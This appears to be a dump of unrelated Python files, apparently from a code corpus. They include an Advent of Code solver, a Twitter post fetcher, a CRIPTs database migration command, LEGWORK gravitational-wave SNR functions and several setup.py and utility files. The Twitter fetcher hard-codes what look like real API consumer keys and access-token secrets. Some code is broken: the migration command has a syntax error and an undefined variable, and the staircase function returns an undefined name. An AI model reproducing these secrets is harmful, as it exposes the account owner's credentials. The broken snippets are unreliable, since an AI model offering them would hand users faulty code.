p_orbitals = orbital_types[1:]
vec = {'px': [1, 0, 0], 'py': [0, 1, 0], 'pz': [0, 0, 1]}
orbital_occupation = { 's':0, 'px':1, 'py':1, 'pz':1 }
my_model = NobleGasModel(atomic_coordinates,model_parameters,ionic_charge,orbital_types,orbitals_per_atom,vec,orbital_occupation)
interaction_matrix,chi_tensor,hamiltonian_matrix,density_matrix,energy_ion = my_model.kernel()
my_scf = scf(hamiltonian_matrix,interaction_matrix,density_matrix,chi_tensor,energy_ion,ionic_charge,orbitals_per_atom)
print("SCF Energy: " + str(my_scf.kernel()))
my_mp2= MP2(my_scf)
print("MP2 Energy" + str(my_mp2.kernel()))
|
python
|
#!/usr/bin/env python3
import os
import random
from collections import namedtuple, defaultdict
dir_path = os.path.dirname(os.path.realpath(__file__))
file = open(dir_path + "/input.txt", "r")
lines = [l.strip() for l in file.readlines()]
"""
acc increases or decreases a single global value called the accumulator by the value given in the argument. For example, acc +7 would increase the accumulator by 7. The accumulator starts at 0. After an acc instruction, the instruction immediately below it is executed next.
jmp jumps to a new instruction relative to itself. The next instruction to execute is found using the argument as an offset from the jmp instruction; for example, jmp +2 would skip the next instruction, jmp +1 would continue to the instruction immediately below it, and jmp -20 would cause the instruction 20 lines above to be executed next.
nop stands for No OPeration - it does nothing. The instruction immediately below it is executed next.
"""
# lines = [
# 'nop +0',
# 'acc +1',
# 'jmp +4',
# 'acc +3',
# 'jmp -3',
# 'acc -99',
# 'acc +1',
# 'jmp -4',
# 'acc +6',
# ]
accumulator = 0
instruction_counts = defaultdict(int)
instruction_history = []
instruction_idx = 0
def acc(arg):
global accumulator
accumulator += arg
def jmp(arg):
global instruction_idx
instruction_idx += arg
def nop(arg):
return None
instructions = {
'acc': acc,
'jmp': jmp,
'nop': nop,
}
I = namedtuple('I', ['op', 'arg'])
def parse(line):
op, arg = line.split()
arg = int(arg)
return I(op, arg)
program = [parse(line) for line in lines]
# print(program)
terminated = False
while not terminated:
if 2 in instruction_counts.values():
break
instruction = program[instruction_idx]
instruction_counts[instruction_idx] += 1
instructions[instruction.op](instruction.arg)
instruction_history.append(instruction)
if instruction.op != 'jmp':
instruction_idx += 1
print('Part 1:', accumulator - instruction_history[-1].arg)
# lines = [
# 'nop +0',
# 'acc +1',
# 'jmp +4',
# 'acc +3',
# 'jmp -3',
# 'acc -99',
# 'acc +1',
# 'nop -4',
# 'acc +6',
# ]
def run_program(program):
accumulator = 0
instruction_counts = defaultdict(int)
instruction_history = []
instruction_idx = 0
terminated = False
success = False
while not terminated:
try:
instruction = program[instruction_idx]
except IndexError:
success = True
break
if 2 in instruction_counts.values():
break
# print(instruction)
instruction_counts[instruction_idx] += 1
instruction_history.append(instruction)
if instruction.op == 'acc':
accumulator += instruction.arg
instruction_idx += 1
if instruction.op == 'jmp':
instruction_idx += instruction.arg
if instruction.op == 'nop':
instruction_idx += 1
return success, accumulator
accumulator = 0
success = False
while not success:
program = [parse(line) for line in lines]
idx = random.choice(range(0, len(program)))
if program[idx].op == 'jmp':
arg = program[idx].arg
program[idx] = I('nop', arg)
elif program[idx].op == 'nop':
arg = program[idx].arg
program[idx] = I('jmp', arg)
# print(program)
success, accumulator = run_program(program)
print('Part 2:', accumulator)
|
python
|
import os
import pytz
from tweepy import OAuthHandler, API, TweepError
from . import Data
from abc import ABC, abstractmethod
import datetime
def check_if_datetime_offset_aware(date):
return date.tzinfo is not None and date.tzinfo.utcoffset(date) is not None
class SocialMediaDataFetch(ABC):
_start_date = datetime.datetime.now() - datetime.timedelta(days=7)
_end_date = datetime.datetime.now()
_data_lst = []
def __init__(self, start_date, end_date):
assert(start_date < end_date)
self._start_date = start_date
self._end_date = end_date
if (check_if_datetime_offset_aware(start_date)):
self._start_date = start_date.astimezone(pytz.utc).replace(tzinfo=None)
if (check_if_datetime_offset_aware(end_date)):
self._end_date = end_date.astimezone(pytz.utc).replace(tzinfo=None)
self._data_lst = []
@abstractmethod
def __get_api_access__(self):
pass
@abstractmethod
def __format_data__(self, data):
pass
@abstractmethod
def __filter_data_by_time__(self, data):
pass
@abstractmethod
def fetch_user_posts(self, user_id):
pass
def get_data_lst(self):
return self._data_lst
class TwitterDataFetch(SocialMediaDataFetch):
_api = None
def __init__(self, start_date = datetime.datetime.now() - datetime.timedelta(days=7), end_date = datetime.datetime.now()):
assert(start_date < end_date)
super().__init__(start_date, end_date)
def __get_user_timeline__(self, user_id, last_id = -1):
if last_id == -1:
new_tweets = self._api.user_timeline(screen_name=user_id, count=200, include_rts = False, tweet_mode = 'extended')
else:
new_tweets = self._api.user_timeline(screen_name=user_id, count=200, include_rts = False, max_id = str(last_id - 1), tweet_mode = 'extended')
return new_tweets
def __get_api_access__(self):
# TODO: move to env file once setup
consumer_key = "Ghsx0hbmNz5UKMrLaJX8Whlmv"
consumer_secret = "gBwqcEvRjJ4BVtvV3knQHgxnEXNzkikndtJsRpYkcz7rQ7eXkV"
access_token = "976956847138791424-oWw9Q00D5zMRpCMwcjiwUiFb7BelZb9"
access_token_secret = "iCDUsytTIjtpPtg3QopBmJifKIiw0Srbc06ROiOp0ZupF"
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
self._api = API(auth)
def __format_data__(self, searched_tweets):
for tweet in searched_tweets:
new_data = Data(tweet.full_text, tweet.created_at)
self._data_lst.append(new_data)
def __filter_data_by_time__(self, tweets):
# tweets are sorted by time from the latest to the earliest
if (self._start_date > tweets[0].created_at):
# means the latest tweet is earlier than the start date, search finished
return False
if (self._end_date < tweets[-1].created_at):
# means the earliest tweet is later than the end date, need to keep extracting
return True
earliest = (len(tweets) - 1)
latest = 0
if (self._start_date > tweets[-1].created_at):
earliest = self.__binary_search_get_time_index(tweets, self._start_date)
if (self._end_date < tweets[0].created_at):
latest = self.__binary_search_get_time_index(tweets[:earliest], self._end_date)
assert(latest >= 0) #prevent bug
self.__format_data__(tweets[latest: earliest])
return earliest == (len(tweets) - 1)
def __binary_search_get_time_index(self, tweets, time):
start_point = (len(tweets) - 1)
end_point = 0
pivot = (start_point + end_point)//2
while (start_point - end_point > 1):
if (time >= tweets[pivot].created_at):
start_point = pivot
else:
end_point = pivot
pivot = (start_point + end_point)//2
return start_point
def fetch_user_posts(self, user_id):
self._data_lst = []
self.__get_api_access__()
last_id = -1
keep_requesting = True
while (keep_requesting):
try:
new_tweets = self.__get_user_timeline__(user_id, last_id)
if not new_tweets:
break
last_id = new_tweets[-1].id
keep_requesting = self.__filter_data_by_time__(new_tweets)
except TweepError as e:
print(e)
break
if __name__ == '__main__':
dataFetch7 = TwitterDataFetch(start_date = datetime.datetime.now() - datetime.timedelta(days=1))
dataFetch7.fetch_user_posts("panettonepapi")
lst_7 = dataFetch7.get_data_lst()
print(len(lst_7))
dataFetch8 = TwitterDataFetch(start_date = datetime.datetime.now() - datetime.timedelta(days=2))
dataFetch8.fetch_user_posts("panettonepapi")
lst_8 = dataFetch8.get_data_lst()
print(len(lst_8))
dataFetch7.fetch_user_posts("panettonepapi")
lst_7 = dataFetch7.get_data_lst()
print(len(lst_7))
|
python
|
import sys
import traceback
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from cripts.config.config import CRIPTsConfig
from cripts.core.mongo_tools import mongo_find_one
from cripts.events.event import Event
from prep import prep_database
class Command(BaseCommand):
"""
Script Class.
"""
option_list = BaseCommand.option_list + (
make_option("-a", "--migrate_all", action="store_true", dest="mall",
default=False,
help="Migrate all collections."),
make_option("-E", "--migrate_events", action="store_true",
dest="events",
default=False,
help="Migrate events."),
)
help = 'Upgrades MongoDB to latest version using mass-migration.'
def handle(self, *args, **options):
"""
Script Execution.
"""
lv = settings.CRIPTS_VERSION
mall = options.get('mall')
events = options.get('events')
if (not mall and
not events and):
print "You must select something to upgrade. See '-h' for options."
sys.exit(1)
else:
upgrade(lv, options)
def migrate_collection(class_obj, sort_ids):
"""
Migrate a collection by opening each document. This will, by nature of the
core functionality in `cripts.core.cripts_mongoengine` check the
schema_version and migrate it if it is not the latest version.
:param class_obj: The class to migrate documents for.
:type class_obj: class that inherits from
:class:`cripts.core.cripts_mongoengine.CriptsBaseAttributes`
:param sort_ids: If we should sort by ids ascending.
:type sort_ids: boolean
"""
# find all documents that don't have the latest schema version
# and migrate those.
version = class_obj._meta['latest_schema_version']
print "\nMigrating %ss" % class_obj._meta['cripts_type']
if sort_ids:
docs = (
class_obj.objects(schema_version__lt=version)
.order_by('+id')
.timeout(False)
)
else:
docs = class_obj.objects(schema_version__lt=version).timeout(False)
total = docs.count()
if not total:
print "\tNo %ss to migrate!" % class_obj._meta['cripts_type']
return
print "\tMigrated 0 of %d" % total,
count = 0
doc = None
try:
for doc in docs:
if 'migrated' in doc._meta and doc._meta['migrated']:
count += 1
print "\r\tMigrated %d of %d" % (count, total),
print ""
except Exception as e:
# Provide some basic info so admin can query their db and figure out
# what bad data is blowing up the migration.
print "\n\n\tAn error occurred during migration!"
print "\tMigrated: %d" % count
formatted_lines = traceback.format_exc().splitlines()
print "\tError: %s" % formatted_lines[-1]
if hasattr(e, 'tlo'):
print "\tDocument ID: %s" % e.tlo
else:
doc_id = mongo_find_one(class_obj._meta.get('collection'),
{'schema_version': {'$lt': version}}, '_id')
print "\tDocument ID: %s" % doc_id.get('_id')
if doc:
print "\tLast ID: %s" % doc.id
sys.exit(1)
def upgrade(lv, options):
"""
Perform the upgrade.
:param lv: The CRIPTs version we are running.
:type lv: str
:param options: The options passed in for what to upgrade.
:type options: dict
"""
# eventually we will do something to check to see what the current version
# of the CRIPTs DB is so we can upgrade through several versions at once.
# this is important if prep scripts need to be run for certain upgrades
# to work properly.
mall = options.get('mall')
events = options.get('events')
skip = options.get('skip')
# run prep migrations
if not skip:
prep_database()
# run full migrations
if mall or events:
migrate_collection(Event, sort_ids)
# Always bump the version to the latest in settings.py
config = CRIPTsConfig.objects()
if len(config) > 1:
print "You have more than one config object. This is really bad."
else:
config = config[0]
config.cripts_version = settings.CRIPTS_VERSION
config.save()
|
python
|
from d20.Manual.Facts import (Fact,
registerFact)
from d20.Manual.Facts.Fields import StringField
@registerFact('hash')
class MD5HashFact(Fact):
_type_ = 'md5'
value = StringField()
@registerFact('hash')
class SHA1HashFact(Fact):
_type_ = 'sha1'
value = StringField()
@registerFact('hash')
class SHA256HashFact(Fact):
_type_ = 'sha256'
value = StringField()
@registerFact('hash')
class SSDeepHashFact(Fact):
_type_ = 'ssdeep'
value = StringField()
@registerFact()
class MimeTypeFact(Fact):
_type_ = 'mimetype'
mimetype = StringField()
filetype = StringField()
|
python
|
"""Module contains the pydvdid package definition.
"""
from setuptools import setup
with open('README.rst') as readme_file:
README = readme_file.read()
setup(
name="pydvdid",
version="1.1",
description="A pure Python implementation of the Windows API IDvdInfo2::GetDiscID method, as used by Windows Media Center to compute a 'practically unique' 64-bit CRC for metadata retrieval.", # pylint: disable=locally-disabled, line-too-long
long_description=README,
author="Steve Wood",
author_email="[email protected]",
url="https://github.com/sjwood/pydvdid",
packages=[
"pydvdid"
],
scripts=[
"bin/pydvdid"
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Home Automation",
"Topic :: Multimedia :: Video",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
],
license="Apache License 2.0",
)
|
python
|
import pygame
from .math_helpers import *
def draw(surface, p1,p2, shading_function, section_length,section_offset):
#Adapted Bresenham's line algorithm from
#http://en.wikipedia.org/wiki/Bresenham%27s_line_algorithm
x0,y0 = p1
x1,y1 = p2
dx = abs(x1 - x0)
dy = abs(y1 - y0)
if x0 < x1: sx = 1
else: sx = -1
if y0 < y1: sy = 1
else: sy = -1
err = dx - dy
while True:
displacement = vec_length(vec_sub([x0,y0],p1)) + section_offset
surface.set_at((x0,y0),shading_function( (displacement%section_length)/section_length ))
if x0 == x1 and y0 == y1: break
e2 = 2 * err
if e2 > -dy:
err = err - dy
x0 = x0 + sx
if e2 < dx:
err = err + dx
y0 = y0 + sy
def aadraw(surface, p1,p2, shading_function, section_length,section_offset, blend):
#Adapted Xiaolin Wu's line algorithm from
#http://en.wikipedia.org/wiki/Xiaolin_Wu%27s_line_algorithm
x0,y0 = p1
x1,y1 = p2
def plot(x,y, c):
displacement = vec_length(vec_sub([x,y],p1)) + section_offset
color2 = shading_function( (displacement%section_length)/float(section_length) )
if blend:
color1 = surface.get_at((x,y))
color = [rndint(color1[i]*(1.0-c) + c*color2[i]) for i in [0,1,2]]
else:
color = [rndint(c*color2[i]) for i in [0,1,2]]
surface.set_at((x,y),color)
def fpart(x): return x - int(x)
def rfpart(x): return 1.0 - fpart(x)
steep = abs(y1 - y0) > abs(x1 - x0)
if steep:
x0,y0 = y0,x0
x1,y1 = y1,x1
if x0 > x1:
x0,x1 = x1,x0
y0,y1 = y1,y0
dx = x1 - x0
dy = y1 - y0
gradient = float(dy) / float(dx)
#handle first endpoint
xend = round(x0)
yend = y0 + gradient * (xend - x0)
xgap = rfpart(x0 + 0.5)
xpxl1 = int(xend) #this will be used in the main loop
ypxl1 = int(yend)
if steep:
plot(ypxl1, xpxl1, rfpart(yend) * xgap)
plot(ypxl1+1, xpxl1, fpart(yend) * xgap)
else:
plot(xpxl1, ypxl1, rfpart(yend) * xgap)
plot(xpxl1, ypxl1+1, fpart(yend) * xgap)
intery = yend + gradient # first y-intersection for the main loop
#handle second endpoint
xend = round(x1)
yend = y1 + gradient * (xend - x1)
xgap = fpart(x1 + 0.5)
xpxl2 = int(xend) #this will be used in the main loop
ypxl2 = int(yend)
if steep:
plot(ypxl2 , xpxl2, rfpart(yend) * xgap)
plot(ypxl2+1, xpxl2, fpart(yend) * xgap)
else:
plot(xpxl2, ypxl2, rfpart(yend) * xgap)
plot(xpxl2, ypxl2+1, fpart(yend) * xgap)
#main loop
for x in range(xpxl1+1, xpxl2, 1):
#for x from xpxl1 + 1 to [through] xpxl2 - 1 do
if steep:
plot(int(intery), x, rfpart(intery))
plot(int(intery)+1, x, fpart(intery))
else:
plot(x, int(intery), rfpart(intery))
plot(x, int(intery)+1, fpart(intery))
intery = intery + gradient
|
python
|
from flask_pyoidc.flask_pyoidc import OIDCAuthentication
from tenacity import retry
@retry
def get_auth(app):
auth = OIDCAuthentication(
app,
issuer=app.config['OIDC_ISSUER'],
client_registration_info=app.config['OIDC_CLIENT_CONFIG'],
)
return auth
|
python
|
"""Functions to calculate signal-to-noise ratio in four different cases"""
import numpy as np
from legwork import strain, psd, utils, evol
import astropy.units as u
__all__ = ['snr_circ_stationary', 'snr_ecc_stationary',
'snr_circ_evolving', 'snr_ecc_evolving']
def snr_circ_stationary(m_c, f_orb, dist, t_obs, position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None, instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
"""
# only need to compute n=2 harmonic for circular
h_0_circ_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=np.zeros_like(f_orb).value, n=2, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g).flatten()**2
h_f_src_circ_2 = h_0_circ_2 * t_obs
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb, t_obs=t_obs, instrument=instrument,
custom_psd=custom_psd)
snr = (h_f_src_circ_2 / h_f_lisa_2)**0.5
return snr.decompose()
def snr_ecc_stationary(m_c, f_orb, ecc, dist, t_obs, harmonics_required,
position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
ecc : `float/array`
Eccentricity
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
harmonics_required : `integer`
Maximum integer harmonic to compute
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
The total can be retrieving by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if ``ret_max_snr_harmonic=True``)
"""
# define range of harmonics
n_range = np.arange(1, harmonics_required + 1).astype(int)
# calculate source signal
h_0_ecc_n_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=ecc, n=n_range, dist=dist,
position=position, polarisation=polarisation,
inclination=inclination, interpolated_g=interpolated_g)**2
# reshape the output since only one timestep
h_0_ecc_n_2 = h_0_ecc_n_2.reshape(len(m_c), harmonics_required)
h_f_src_ecc_2 = h_0_ecc_n_2 * t_obs
# calculate harmonic frequencies and noise
f_n = n_range[np.newaxis, :] * f_orb[:, np.newaxis]
if interpolated_sc is not None:
h_f_lisa_n_2 = interpolated_sc(f_n.flatten())
h_f_lisa_n_2 = h_f_lisa_n_2.reshape(f_n.shape)
else:
h_f_lisa_n_2 = psd.power_spectral_density(f=f_n, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
snr_n_2 = (h_f_src_ecc_2 / h_f_lisa_n_2).decompose()
if ret_snr2_by_harmonic:
return snr_n_2
# calculate the signal-to-noise ratio
snr = (np.sum(snr_n_2, axis=1))**0.5
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
def snr_circ_evolving(m_1, m_2, f_orb_i, dist, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None,
instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
n_step : `int`
Number of time steps during observation duration
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
sn : `float/array`
SNR for each binary
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_circ(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
t_evol = np.minimum(t_merge - (1 * u.s), t_obs)
# get f_orb evolution
f_orb_evol = evol.evol_circ(t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
maxes = np.where(f_orb_evol == 1e2 * u.Hz, -1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# calculate the characteristic power
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=np.zeros_like(f_orb_evol).value, n=2, dist=dist,
interpolated_g=interpolated_g)**2
h_c_n_2 = h_c_n_2.reshape(len(m_c), n_step)
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb_evol.flatten())
h_f_lisa_2 = h_f_lisa_2.reshape(f_orb_evol.shape)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb_evol, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
h_c_lisa_2 = (2 * f_orb_evol)**2 * h_f_lisa_2
snr = np.trapz(y=h_c_n_2 / h_c_lisa_2, x=2 * f_orb_evol, axis=1)**0.5
return snr.decompose()
def snr_ecc_evolving(m_1, m_2, f_orb_i, dist, ecc, harmonics_required, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None, n_proc=1,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and evolving sources.
Note that this function will not work for exactly circular (ecc = 0.0)
binaries.
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
ecc : `float/array`
Eccentricity
harmonics_required : `int`
Maximum integer harmonic to compute
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
n_step : `int`
Number of time steps during observation duration
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
n_proc : `int`
Number of processors to split eccentricity evolution over, where
the default is n_proc=1
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
The total can be retrieving by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if
``ret_max_snr_harmonic=True``)
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_ecc(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i, ecc_i=ecc)
t_before = 0.1 * u.yr
t_evol = np.minimum(t_merge - t_before, t_obs).to(u.s)
# get eccentricity and f_orb evolutions
e_evol, f_orb_evol = evol.evol_ecc(ecc_i=ecc, t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2,
f_orb_i=f_orb_i, n_proc=n_proc, t_before=t_before, t_merge=t_merge)
maxes = np.where(np.logical_and(e_evol == 0.0, f_orb_evol == 1e2 * u.Hz),
-1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# create harmonics list and multiply for nth frequency evolution
harms = np.arange(1, harmonics_required + 1).astype(int)
f_n_evol = harms[np.newaxis, np.newaxis, :] * f_orb_evol[..., np.newaxis]
# calculate the characteristic strain
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=e_evol, n=harms, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g)**2
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa = interpolated_sc(f_n_evol.flatten())
else:
h_f_lisa = psd.power_spectral_density(f=f_n_evol.flatten(), t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
h_f_lisa = h_f_lisa.reshape(f_n_evol.shape)
h_c_lisa_2 = f_n_evol**2 * h_f_lisa
snr_evol = h_c_n_2 / h_c_lisa_2
# integrate, sum and square root to get SNR
snr_n_2 = np.trapz(y=snr_evol, x=f_n_evol, axis=1)
if ret_snr2_by_harmonic:
return snr_n_2
snr_2 = snr_n_2.sum(axis=1)
snr = np.sqrt(snr_2)
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
|
python
|
"""
QUESTION:
This is an interview question asked by Amazon.
There exists a staircase with N steps, and you can climb up either 1 or 2 steps at a time.
Given N, write a function that returns the number of unique ways you can climb the staircase. The order of the steps matters.
For example, if N is 4, then there are 5 unique ways:
1, 1, 1, 1
2, 1, 1
1, 2, 1
1, 1, 2
2, 2
"""
def staircase(s):
return n if s <= 3 else (staircase(s-1) + staircase(s-2))
staircase(4)
|
python
|
#!/usr/bin/env python
from setuptools import setup
setup(name='dvaclient',
version='1.0',
description='Deep Video Analytics Client',
author='Akshay Bhat',
author_email='[email protected]',
url='https://www.deepvideoanalytics.com/',
packages=['dvaclient'],
package_data={'dvaclient': ['schema.json']},
include_package_data=True,
install_requires=[
'jsonschema',
'requests'
],
)
|
python
|
from chainer.backends import cuda
import numpy as np
def mask_to_bbox(mask):
"""Compute the bounding boxes around the masked regions.
This function accepts both :obj:`numpy.ndarray` and :obj:`cupy.ndarray` as
inputs.
Args:
mask (array): An array whose shape is :math:`(R, H, W)`.
:math:`R` is the number of masks.
The dtype should be :obj:`numpy.bool`.
Returns:
array:
The bounding boxes around the masked regions.
This is an array whose shape is :math:`(R, 4)`.
:math:`R` is the number of bounding boxes.
The dtype should be :obj:`numpy.float32`.
"""
R, H, W = mask.shape
xp = cuda.get_array_module(mask)
instance_index, ys, xs = xp.nonzero(mask)
bbox = xp.zeros((R, 4), dtype=np.float32)
for i in range(R):
ys_i = ys[instance_index == i]
xs_i = xs[instance_index == i]
if len(ys_i) == 0:
continue
y_min = ys_i.min()
x_min = xs_i.min()
y_max = ys_i.max() + 1
x_max = xs_i.max() + 1
bbox[i] = xp.array([y_min, x_min, y_max, x_max], dtype=np.float32)
return bbox
|
python
|
from draco.programs import constraints, definitions, generate, hard, helpers
def test_has_definitions():
assert len(definitions.program)
assert len(definitions.blocks)
def test_definitions_has_marktype():
assert "mark_type" in definitions.blocks
def test_has_constraints():
assert len(constraints.program)
assert len(constraints.blocks)
def test_constraints_has_invalid_domain():
assert "invalid_domain" in constraints.blocks
def test_has_generate():
assert len(generate.program)
assert len(generate.blocks)
def test_generate_has_marktype():
assert "mark_type" in generate.blocks
def test_has_hard():
assert len(hard.program)
assert len(hard.blocks)
def test_has_helpers():
assert len(helpers.program)
assert len(helpers.blocks)
|
python
|
from wpilib import DigitalInput
import robotmap
gear_mech_switch = None
def init():
"""
Initialize switch objects.
"""
global gear_mech_switch
gear_mech_switch = DigitalInput(robotmap.switches.gear_switch_channel)
|
python
|
class Solution:
def multiply(self, T, M):
a = (T[0][0] * M[0][0] + T[0][1] * M[1][0] + T[0][2] * M[2][0])
b = (T[0][0] * M[0][1] + T[0][1] * M[1][1] + T[0][2] * M[2][1])
